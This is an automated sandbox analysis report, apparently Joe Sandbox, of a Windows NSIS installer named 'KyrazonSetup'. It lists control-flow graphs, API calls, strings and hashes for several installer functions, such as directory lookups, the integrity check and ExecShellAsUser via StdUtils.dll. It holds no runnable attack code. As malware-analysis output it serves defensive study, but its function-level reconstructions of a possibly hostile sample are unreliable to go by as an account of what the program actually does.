                                                                                      control_flow_graph 362 405fc2-405fcd 363 405fe0-405ff6 362->363 364 405fcf-405fde 362->364 365 4061e7-4061eb 363->365 366 405ffc-406007 363->366 364->363 367 4061f1-4061fb 365->367 368 406019-406023 365->368 366->365 369 40600d-406014 366->369 370 406206-406207 367->370 371 4061fd-406201 call 405fa0 367->371 368->367 372 406029-406030 368->372 369->365 371->370 374 406036-40606a 372->374 375 4061da 372->375 376 406070-40607a 374->376 377 406187-40618a 374->377 378 4061e4-4061e6 375->378 379 4061dc-4061e2 375->379 382 406094 376->382 383 40607c-406080 376->383 380 4061ba-4061bd 377->380 381 40618c-40618f 377->381 378->365 379->365 388 4061cb-4061d8 lstrlenA 380->388 389 4061bf-4061c6 call 405fc2 380->389 385 406191-40619d call 405efe 381->385 386 40619f-4061ab call 405fa0 381->386 387 40609b-4060a2 382->387 383->382 384 406082-406086 383->384 384->382 390 406088-40608c 384->390 400 4061b0-4061b6 385->400 386->400 392 4060a4-4060a6 387->392 393 4060a7-4060a9 387->393 388->365 389->388 390->382 396 40608e-406092 390->396 392->393 398 4060e2-4060e5 393->398 399 4060ab-4060ce call 405e87 393->399 396->387 403 4060f5-4060f8 398->403 404 4060e7-4060f3 GetSystemDirectoryA 398->404 411 4060d4-4060dd call 405fc2 399->411 412 40616e-406172 399->412 400->388 402 4061b8 400->402 408 40617f-406185 call 40620a 402->408 405 406165-406167 403->405 406 4060fa-406108 GetWindowsDirectoryA 403->406 409 406169-40616c 404->409 405->409 410 40610a-406114 405->410 406->405 408->388 409->408 409->412 414 406116-406119 410->414 415 40612e-406144 SHGetSpecialFolderLocation 410->415 411->409 412->408 417 406174-40617a lstrcatA 412->417 414->415 419 40611b-406122 414->419 420 406162 415->420 421 406146-406160 SHGetPathFromIDListA CoTaskMemFree 415->421 417->408 423 40612a-40612c 419->423 420->405 421->409 421->420 423->409 423->415
                                                                                      APIs
                                                                                      • GetSystemDirectoryA.KERNEL32(Remove folder: ,00002000), ref: 004060ED
                                                                                      • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00002000,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,004050FF,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000), ref: 00406100
                                                                                      • SHGetSpecialFolderLocation.SHELL32(004050FF,74DF23A0,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,004050FF,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000), ref: 0040613C
                                                                                      • SHGetPathFromIDListA.SHELL32(74DF23A0,Remove folder: ), ref: 0040614A
                                                                                      • CoTaskMemFree.OLE32(74DF23A0), ref: 00406156
                                                                                      • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                                                                                      • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,004050FF,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00000000,00422028,74DF23A0), ref: 004061CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                      • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 717251189-672788062
                                                                                      • Opcode ID: 822a315553691d0959fe1cf19c79311585cb2dd1ce76ac22f295ffb80e5f4c0b
                                                                                      • Instruction ID: 7c2adf64d8328dff01df486c2e27b57e2c51f51cfd57b2d0b0521008d1caed3a
                                                                                      • Opcode Fuzzy Hash: 822a315553691d0959fe1cf19c79311585cb2dd1ce76ac22f295ffb80e5f4c0b
                                                                                      • Instruction Fuzzy Hash: 2061F675900205AFEB119F24CD84BBF7BA59B16314F12403FE503BA2D2C77C89A2CB5A
                                                                                      Function 00402D63 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 424 402d63-402db1 GetTickCount GetModuleFileNameA call 405b39 427 402db3-402db8 424->427 428 402dbd-402deb call 405fa0 call 40597f call 405fa0 GetFileSize 424->428 429 402f95-402f99 427->429 436 402df1 428->436 437 402ed8-402ee6 call 402cff 428->437 438 402df6-402e0d 436->438 444 402ee8-402eeb 437->444 445 402f3b-402f40 437->445 440 402e11-402e1a call 4031ae 438->440 441 402e0f 438->441 450 402e20-402e27 440->450 451 402f42-402f4a call 402cff 440->451 441->440 446 402eed-402f05 call 4031c4 call 4031ae 444->446 447 402f0f-402f39 GlobalAlloc call 4031c4 call 402f9c 444->447 445->429 446->445 470 402f07-402f0d 446->470 447->445 475 402f4c-402f5d 447->475 454 402ea3-402ea7 450->454 455 402e29-402e3d call 405af4 450->455 451->445 459 402eb1-402eb7 454->459 460 402ea9-402eb0 call 402cff 454->460 455->459 473 402e3f-402e46 455->473 466 402ec6-402ed0 459->466 467 402eb9-402ec3 call 4063ef 459->467 460->459 466->438 474 402ed6 466->474 467->466 470->445 470->447 473->459 479 402e48-402e4f 473->479 474->437 476 402f65-402f6a 475->476 477 402f5f 475->477 480 402f6b-402f71 476->480 477->476 479->459 481 402e51-402e58 479->481 480->480 482 402f73-402f8e SetFilePointer call 405af4 480->482 481->459 483 402e5a-402e61 481->483 486 402f93 482->486 483->459 485 402e63-402e83 483->485 485->445 487 402e89-402e8d 485->487 486->429 488 402e95-402e9d 487->488 489 402e8f-402e93 487->489 488->459 490 402e9f-402ea1 488->490 489->474 489->488 490->459
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402D74
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00489000,00002000), ref: 00402D90
                                                                                        • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,00489000,80000000,00000003), ref: 00405B3D
                                                                                        • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0048B000,00000000,00481000,00481000,00489000,00489000,80000000,00000003), ref: 00402DDC
                                                                                      Strings
                                                                                      • Null, xrefs: 00402E5A
                                                                                      • Inst, xrefs: 00402E48
                                                                                      • Error launching installer, xrefs: 00402DB3
                                                                                      • soft, xrefs: 00402E51
                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                      • API String ID: 4283519449-1074636621
                                                                                      • Opcode ID: f8e604f13ddaaec11f58daf98c7cc58da5ae01dfe025c9ac4b8039e2ba9f7a05
                                                                                      • Instruction ID: 3cf286ad26c05deb68a266c39863f6b625e9839bc1dce875a95444cfa52a9705
                                                                                      • Opcode Fuzzy Hash: f8e604f13ddaaec11f58daf98c7cc58da5ae01dfe025c9ac4b8039e2ba9f7a05
                                                                                      • Instruction Fuzzy Hash: E551D171900215ABDB119F65DE89B9F7AB8EB05369F10403BF904B62D1C7BC9D408BAD
                                                                                      Function 00402F9C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 491 402f9c-402fb0 492 402fb2 491->492 493 402fb9-402fc2 491->493 492->493 494 402fc4 493->494 495 402fcb-402fd0 493->495 494->495 496 402fe0-402fed call 4031ae 495->496 497 402fd2-402fdb call 4031c4 495->497 501 402ff3-402ff7 496->501 502 40319c 496->502 497->496 503 403147-403149 501->503 504 402ffd-403046 GetTickCount 501->504 505 40319e-40319f 502->505 506 403189-40318c 503->506 507 40314b-40314e 503->507 508 4031a4 504->508 509 40304c-403054 504->509 510 4031a7-4031ab 505->510 511 403191-40319a call 4031ae 506->511 512 40318e 506->512 507->508 513 403150 507->513 508->510 514 403056 509->514 515 403059-403067 call 4031ae 509->515 511->502 525 4031a1 511->525 512->511 518 403153-403159 513->518 514->515 515->502 524 40306d-403076 515->524 521 40315b 518->521 522 40315d-40316b call 4031ae 518->522 521->522 522->502 528 40316d-403172 call 405be0 522->528 527 40307c-40309c call 40645d 524->527 525->508 533 4030a2-4030b5 GetTickCount 527->533 534 40313f-403141 527->534 532 403177-403179 528->532 535 403143-403145 532->535 536 40317b-403185 532->536 537 4030b7-4030bf 533->537 538 4030fa-4030fc 533->538 534->505 535->505 536->518 539 403187 536->539 540 4030c1-4030c5 537->540 541 4030c7-4030f7 MulDiv wsprintfA call 4050c7 537->541 542 403133-403137 538->542 543 4030fe-403102 538->543 539->508 540->538 540->541 541->538 542->509 544 40313d 542->544 546 403104-40310b call 405be0 543->546 547 403119-403124 543->547 544->508 551 403110-403112 546->551 549 403127-40312b 547->549 549->527 552 403131 549->552 551->535 553 403114-403117 551->553 552->508 553->549
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: ( B$( B$(A$(A$... %d%%
                                                                                      • API String ID: 551687249-1613237036
                                                                                      • Opcode ID: 342d87f3bf68deecb177d7018135bb7b71e2d571e5030e4911bfbc87acd37eb6
                                                                                      • Instruction ID: eba0525db15093f61ee08b6c00ba5fdbd9f6e41697776a2ec06e61400ac9bd7a
                                                                                      • Opcode Fuzzy Hash: 342d87f3bf68deecb177d7018135bb7b71e2d571e5030e4911bfbc87acd37eb6
                                                                                      • Instruction Fuzzy Hash: 2A517E71901219ABDB10DF56DA0479E7BB8AF4875AF10413BE810BB2C1D778DB40CBA9
                                                                                      Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 623 401759-40177c call 402acb call 4059a5 628 401786-401798 call 405fa0 call 405938 lstrcatA 623->628 629 40177e-401784 call 405fa0 623->629 634 40179d-4017a3 call 40620a 628->634 629->634 639 4017a8-4017ac 634->639 640 4017ae-4017b8 call 4062a3 639->640 641 4017df-4017e2 639->641 648 4017ca-4017dc 640->648 649 4017ba-4017c8 CompareFileTime 640->649 643 4017e4-4017e5 call 405b14 641->643 644 4017ea-401806 call 405b39 641->644 643->644 651 401808-40180b 644->651 652 40187e-4018a7 call 4050c7 call 402f9c 644->652 648->641 649->648 654 401860-40186a call 4050c7 651->654 655 40180d-40184f call 405fa0 * 2 call 405fc2 call 405fa0 call 4056bc 651->655 666 4018a9-4018ad 652->666 667 4018af-4018bb SetFileTime 652->667 664 401873-401879 654->664 655->639 687 401855-401856 655->687 668 402960 664->668 666->667 670 4018c1-4018cc FindCloseChangeNotification 666->670 667->670 674 402962-402966 668->674 672 4018d2-4018d5 670->672 673 402957-40295a 670->673 676 4018d7-4018e8 call 405fc2 lstrcatA 672->676 677 4018ea-4018ed call 405fc2 672->677 673->668 681 4018f2-4022ec call 4056bc 676->681 677->681 681->673 681->674 687->664 689 401858-401859 687->689 689->654
                                                                                      APIs
                                                                                      • lstrcatA.KERNEL32(00000000,00000000,ExecShellAsUser,0047F000,00000000,00000000,00000031), ref: 00401798
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,ExecShellAsUser,ExecShellAsUser,00000000,00000000,ExecShellAsUser,0047F000,00000000,00000000,00000031), ref: 004017C2
                                                                                        • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00002000,004032DE,0044E400,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                                                                        • Part of subcall function 004050C7: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                                                        • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                                                        • Part of subcall function 004050C7: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,004030F7,004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0), ref: 00405123
                                                                                        • Part of subcall function 004050C7: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\), ref: 00405135
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                                                        • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp$C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\StdUtils.dll$ExecShellAsUser
                                                                                      • API String ID: 1941528284-3500068194
                                                                                      • Opcode ID: d1bc28a5a42b1dbe04e2539b2cb95902de82cba6976b7ef9835eae16b92b2e17
                                                                                      • Instruction ID: 96f3b1abcda028b22533463005ae4ed6ec9ac8348439948b24e876d516825338
                                                                                      • Opcode Fuzzy Hash: d1bc28a5a42b1dbe04e2539b2cb95902de82cba6976b7ef9835eae16b92b2e17
                                                                                      • Instruction Fuzzy Hash: 1141B671900615BACF107BA5CD45DAF3A79EF45369B60823FF421F20E2D77C8A418A6D
                                                                                      Function 004062CA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 690 4062ca-4062ea GetSystemDirectoryA 691 4062ec 690->691 692 4062ee-4062f0 690->692 691->692 693 406300-406302 692->693 694 4062f2-4062fa 692->694 696 406303-406335 wsprintfA LoadLibraryExA 693->696 694->693 695 4062fc-4062fe 694->695 695->696
                                                                                      APIs
                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                                                                      • wsprintfA.USER32 ref: 0040631A
                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                      • String ID: %s%s.dll$UXTHEME$\
                                                                                      • API String ID: 2200240437-4240819195
                                                                                      • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                      • Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
                                                                                      • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                                      • Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C
                                                                                      Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 697 401c0a-401c2a call 402aa9 * 2 702 401c36-401c3a 697->702 703 401c2c-401c33 call 402acb 697->703 705 401c46-401c4c 702->705 706 401c3c-401c43 call 402acb 702->706 703->702 709 401c9a-401cc0 call 402acb * 2 FindWindowExA 705->709 710 401c4e-401c6a call 402aa9 * 2 705->710 706->705 722 401cc6 709->722 720 401c8a-401c98 SendMessageA 710->720 721 401c6c-401c88 SendMessageTimeoutA 710->721 720->722 723 401cc9-401ccc 721->723 722->723 724 401cd2 723->724 725 402957-402966 723->725 724->725
                                                                                      APIs
                                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: b497a5e5830524a78c3b1dc5bcd9d1dec719188b70264decbce2c5befc7e4cb3
                                                                                      • Instruction ID: 2ba5304c1a7bae2d5eac8bf435d3177e819ffae85e7f6e151422e65e61bc6dac
                                                                                      • Opcode Fuzzy Hash: b497a5e5830524a78c3b1dc5bcd9d1dec719188b70264decbce2c5befc7e4cb3
                                                                                      • Instruction Fuzzy Hash: 92219171E44209BEEB15DFA5D986AAD7BB4EF84304F24843EF501B61D0CB7885408F28
                                                                                      Function 004023D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
